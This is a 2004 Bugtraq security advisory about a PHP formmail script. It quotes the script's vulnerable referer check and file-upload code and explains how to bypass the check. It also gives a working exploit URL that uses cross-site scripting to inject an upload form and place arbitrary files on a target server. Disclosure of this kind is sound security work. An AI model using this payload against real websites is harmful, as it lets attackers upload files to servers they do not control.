[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20040206113652.6553.qmail@www.securityfocus.com>
Date: 6 Feb 2004 11:36:52 -0000
From: Himeur Nourredine <lostnoobs@...urity-challenge.com>
To: bugtraq@...urityfocus.com
Subject: formmail (PHP) Upload file using CSS
Informations :
°°°°°°°°°°°°°°
Website : http://www.dtheatre.com/scripts/
Version : all
Problem : Upload file
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
formmail.php :
------------------------------------------------------------------
function check_referer($referers) {
if (count($referers)) {
$found = false;
$temp = explode("/",getenv("HTTP_REFERER"));
$referer = $temp[2];
if ($referer=="") {$referer = $_SERVER['HTTP_REFERER'];
list($remove,$stuff)=split('//',$referer,2);
list($home,$stuff)=split('/',$stuff,2);
$referer = $home;
}
for ($x=0; $x < count($referers); $x++) {
if (eregi ($referers[$x], $referer)) {
$found = true;
}
}
if ($referer =="")
$found = false;
if (!$found){
print_error("You are coming from an <b>unauthorized domain.</b>");
error_log("[FormMail.php] Illegal Referer. (".getenv("HTTP_REFERER").")", 0);
}
return $found;
} else {
return true; // not a good idea, if empty, it will allow it.
}
}
------------------------------------------------------------------
...
------------------------------------------------------------------
// check for a file if there is a file upload it
if ($file_name) {
if ($file_size > 0) {
if (!ereg("/$", $path_to_file))
$path_to_file = $path_to_file."/";
$location = $path_to_file.$file_name;
if (file_exists($path_to_file.$file_name))
$location = $path_to_file.rand(1000,3000).".".$file_name;
copy($file,$location);
unlink($file);
$content .= "Uploaded File: ".$location."\n";
}
}
------------------------------------------------------------------
You can bypassing the REFERER protection and put a file on the site (for exemple with a Cross Site Scripting on the same site).This option running even if this function is desactivated.
Exploit :
°°°°°°°°°
http://www.exemple.com/foo.php?css=<form%20method=post%20enctype=multipart/form-data%20action=formmail.php><input%20type=hidden%20name=MAX_FILE_SIZE%20value=1000000><input%20type=hidden%20name=path_to_file%20value=./><input%20type=text%20name=email><input%20type=file%20name=file%20><input%20type=hidden%20name=recipient%20%20value=%20foo@....com%20><input%20type=submit>
Whith :
http://www.exemple.com/formmail.php
and
http://www.exemple.com/file.php?css= <-- Cross Site Scripting Here
For More details :
°°°°°°°°°°°°°°
IRC : hauzgur.serveirc.com / #defaced
Nourredine Himeur
www.security-challenge.com
Powered by blists - more mailing lists